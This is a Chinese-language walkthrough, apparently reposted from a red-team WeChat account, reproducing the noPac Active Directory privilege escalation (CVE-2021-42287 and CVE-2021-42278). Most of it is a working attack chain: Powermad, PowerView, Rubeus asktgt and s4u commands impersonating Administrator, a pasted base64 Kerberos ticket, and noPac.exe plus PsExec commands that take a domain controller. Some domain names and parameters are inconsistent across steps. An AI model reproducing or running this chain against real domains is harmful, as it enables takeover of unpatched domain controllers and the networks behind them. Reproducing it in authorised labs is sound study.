CVE-2021-42287 and CVE-2021-42278 域内提权漏洞复现
The following article is from 红队攻防 Author Clown
漏洞原理:
假如域内有一台域控名为 DC(域控对应的机器用户为 DC$),此时攻击者利用漏洞 CVE-2021-42287 创建一个机器用户 saulGoodman$,再把机器用户 saulGoodman$ 的 sAMAccountName 改成 DC。然后利用 DC 去申请一个TGT票据。再把 DC 的sAMAccountName 改为 saulGoodman$。这个时候 KDC 就会判断域内没有 DC 和这个用户,自动去搜索 DC$(DC$是域内已经的域控DC 的 sAMAccountName),攻击者利用刚刚申请的 TGT 进行 S4U2self,模拟域内的域管去请求域控 DC 的 ST 票据,最终获得域控制器DC的权限
利用条件:
(1)一个普通域成员帐户
(2)域用户有创建机器用户的权限(一般默认权限)
(3)DC未打补丁KB5008380或KB5008602
普通域用户
net user testuser /do1、通过利⽤ powermad.ps1 新增机器帐号(域⽤户默认可以新建10个机器账户)
下载地址:https://github.com/Kevin-Robertson/PowermadSet-ExecutionPolicy Bypass -Scope ProcessImport-Module .\Powermad.ps1
添加用户test123,设置一个密码:123.comNew-MachineAccount -MachineAccount test123 -Domain good.test -DomainController dc.good.test -Verbose2、clear its SPNs(清除SPN信息)
下载地址:https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1导⼊⼀下 PowerView.ps1Import-Module .\PowerView.ps1//CN=test123Set-DomainObject "CN=test123,CN=Computers,DC=god,DC=com" -Clear 'serviceprincipalname' -Verbose3、reset the computer name(重设机器名称)
//test123为刚才新建的用户//由于当前DC SPN账户为dc$,故要设置为dc进行伪造Set-MachineAccountAttribute -MachineAccount test123 -Value "dc" -Attribute samaccountname -Verbose4、Request TGT (请求TGT)
//password为刚才新建机器账号时的密码Rubeus.exe asktgt /user:dc /password:123.com /domian:good.test /dc:dc.good.test /nowrap5、Change Machine Account samaccountname(还原初始账户属性)
将值修改回到原来的属性
//重新还原机器帐户属性后,现在就可以使用能检索到的TGT请求S4U2self票证来获得使用DC密钥加密的ST,同时还可以将票证中的sname重写为LDAP服务Set-MachineAccountAttribute -MachineAccount test123 -Value "test123" -Attribute samaccountname -Verbose6、Request S4U2self(获取票据)
利用刚刚申请的TGT进行S4U2self,模拟域内的域管去请求域控DC的ST票据,最终获得域控制器DC的权限.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:dc.good.test /self /altservice:cifs/dc.good.test /ptt /ticket:doIElDCCBJCgAwIBBaEDAgEWooIDuDCCA7RhggOwMIIDrKADAgEFoQsbCUdPT0QuVEVTVKIeMBygAwIBAqEVMBMbBmtyYnRndBsJZ29vZC50ZXN0o4IDdjCCA3KgAwIBEqEDAgECooIDZASCA2D1NkULVFWzUsgYnl2X8/maEWYTLSkTzewm8qVVER95KB35xolvPAZsUT8eJXIq+EJuyottlJuRvP7yqjZTAaa2QQwWLHbYOv8qOSJM1hvcbYPnOLotWaLRtx9TFP92RYEGobxnhaHOV/V4wwdlOVJuYX42Zj9MhUuvyITFhahfIV7Pn5a8nBOjGerncFK5zjUTi+LzVoKFKzG4hnbzWZA8DSz2FSpKm157So+YbrsakmjD/E7ZSHCEwFv9AtCze2BlWYrmf30chZfi6Ee+YWv4CjSW5nuWSU7ge61ia8Kd8D/+JjdIfVUpJQ2vpqZGMzpYJ1zUFHXDPR4p/DNw094Wlkfnp7eHo+dSLXedUEJIRQ8kMktMlbXMrvBvwVF3SbM6UrNDmDSMCYLb7G9hrIC0ypgOkgDFE838aoNsMHOEjsb8R+cE7Xy1WBfQ1IlqxgDPO9GD1yqixkbg6ZVI2TLdaj/vaGHl6EWGEnI3zHWw+aDagHARHAU3ul+CCGpyVl7m+EPYUDY+klLrbmSxHeEl7CrYgKVg00UIrorHqHodRcYiXHrGiZIc/WbFOM/24e5cuSJEH6qlKm6KZZrrnuN6By9zPoJFDmcv4p6TkXWrLsdlOrt3DaXuPYPJZ8xttQDY88u2Tzer8/BhXCSJYpC9q1MqJ+8yBHe0OELIcnElnzMRCWcn5t+cMrwYEotD/4Xqv2G68axUpVUuCqs9TkYDOOpYcDwvNEXd0l/gDLP9QGjXPb1eo0eK1NXcldsGudrOc8T7bZd4MkIy36ijd0M1fkiXTJAfMKqDf+H1yNAK9fV/hpnj+xPr5wUybfLVCjLNPvfWssHkW7LlrssMDWotOYEwtfGRR570L+NDiqJIgZdr/bTpb0KIpS7j+I7kFAwghObgMfGfdXBOWsi9LEZL1hzwisDTTBBoYZjOdP+qCR/SlgvxEr6d0phMYAvHKN2mc/8QMCqWeZfXMwURG9rz48AzW2pQcSO9X9gctcJBNlmK9Vt26w3S3CAoYDW9WS9m5rj/Z4BaMzlPKycEJS0eBYQx7C98olJp6ErFM6yYg9kZkQSIyCp1PIBeA4gcIWIL1ICw+sUAjxGpw/STtP3kp8wdSk7giwjVOojlJBfEVVz6LrUFo7mF9fOS1xB2st2jgccwgcSgAwIBAKKBvASBuX2BtjCBs6CBsDCBrTCBqqAbMBmgAwIBF6ESBBASmP2+puGKNrjbgiQJEPFcoQsbCUdPT0QuVEVTVKIPMA2gAwIBAaEGMAQbAmRjowcDBQBA4QAApREYDzIwMjExMjI3MTMyODI4WqYRGA8yMDIxMTIyNzIzMjgyOFqnERgPMjAyMjAxMDMxMzI4MjhaqAsbCUdPT0QuVEVTVKkeMBygAwIBAqEVMBMbBmtyYnRndBsJZ29vZC50ZXN0查询票据
工具使用:
下载地址: https://github.com/cube0x0/noPac扫描
//域账户noPac.exe scan -domain good.test -user testuser -pass 123456aa..直接利用
//-user 域用户 -pass 域密码 //域控的机器名.hacker.test/mAccount 随便填/mPassword 随便填noPac.exe -domain good.test -user testuser -pass 123456aa.. /dc DC.good.test /mAccount dadd /mPassword sdadasdsa /service cifs /pttPsExec.exe \\dc.hacker.test cmd.exe每打一次会增加一个机器名,域⽤户默认可以新建10个机器账户
微信搜索关注 "红队攻防" 扫一扫即可关注红队攻防